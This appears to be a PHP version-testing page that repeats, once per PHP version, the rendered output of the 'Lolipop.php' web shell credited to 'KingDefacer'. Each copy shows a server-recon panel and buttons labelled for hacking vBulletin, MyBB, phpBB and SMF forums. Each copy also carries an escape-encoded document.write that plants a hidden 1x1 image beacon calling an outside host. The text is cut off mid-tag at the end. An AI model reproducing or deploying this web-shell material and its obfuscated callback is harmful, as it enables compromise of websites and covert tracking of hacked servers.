type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.3.6
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.3.6</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.3.5
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.3.5</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.3.4
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.3.4</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.3.3
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.3.3</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.3.2
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.3.2</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.3.1
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.3.1</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.3.0
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.3.0</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.25
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.25</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.24
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.24</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.23
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.23</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.22
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.22</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.2.21
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.2.21</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' 